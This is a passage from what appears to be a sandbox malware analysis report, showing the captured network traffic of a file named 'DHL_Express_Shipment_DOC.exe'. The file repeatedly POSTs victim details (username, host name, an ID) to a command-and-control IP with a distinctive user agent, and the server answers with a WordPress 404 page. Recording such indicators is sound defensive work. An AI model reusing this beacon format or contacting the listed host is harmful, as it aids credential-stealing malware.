                  Mar 21, 2023 07:13:29.829566956 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829596043 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829613924 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.829627037 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829657078 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829679966 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.829688072 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829699993 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.829720020 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829747915 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829762936 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.829778910 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829835892 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.996907949 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.996984005 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997034073 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997081995 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997129917 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997149944 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997150898 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997179031 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997246027 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997292995 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997293949 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997342110 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997390032 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997389078 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997436047 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997437954 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997487068 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997533083 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997535944 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997584105 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997631073 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997632027 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997680902 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997726917 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997775078 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997776985 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997823000 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997870922 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997872114 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997915983 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:30.165044069 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:30.165110111 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:30.165162086 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:30.165230036 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:30.165230036 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:34.458470106 CET4970280192.168.2.464.227.48.212
                  • 64.227.48.212
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.4 | 49697 | 64.227.48.212 | 80 | C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 21, 2023 07:13:21.229954004 CET | 149 | OUT | POST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 190
                  Connection: close
                  Mar 21, 2023 07:13:21.398611069 CET | 149 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.rujones066656DESKTOP-716T771k08F9C4E9C79A3B52B3F739430Qy2ot
                  Mar 21, 2023 07:13:22.199431896 CET | 150 | IN | HTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:21 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 
74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:22.199486017 CET | 152 | IN | Data Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:22.199523926 CET | 153 | IN | Data Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:22.199561119 CET | 154 | IN | Data Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
                  Mar 21, 2023 07:13:22.199598074 CET | 156 | IN | Data Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:22.199635029 CET | 157 | IN | Data Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:22.199671984 CET | 159 | IN | Data Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:22.199707031 CET | 160 | IN | Data Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:22.199743986 CET | 161 | IN | Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d
                  Data Ascii: p--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff
                  Mar 21, 2023 07:13:22.199781895 CET | 163 | IN | Data Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:22.368415117 CET | 164 | IN | Data Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.4 | 49698 | 64.227.48.212 | 80 | C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 21, 2023 07:13:22.578655958 CET | 169 | OUT | POST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 190
                  Connection: close
                  Mar 21, 2023 07:13:22.746746063 CET | 169 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.rujones066656DESKTOP-716T771+08F9C4E9C79A3B52B3F739430qeUS5
                  Mar 21, 2023 07:13:23.510366917 CET | 170 | IN | HTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:22 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 
74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:23.510523081 CET | 172 | IN | Data Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:23.510556936 CET | 173 | IN | Data Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:23.510648012 CET | 174 | IN | Data Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
                  Mar 21, 2023 07:13:23.510678053 CET | 176 | IN | Data Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:23.510725021 CET | 177 | IN | Data Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:23.510778904 CET | 178 | IN | Data Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:23.510813951 CET | 180 | IN | Data Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
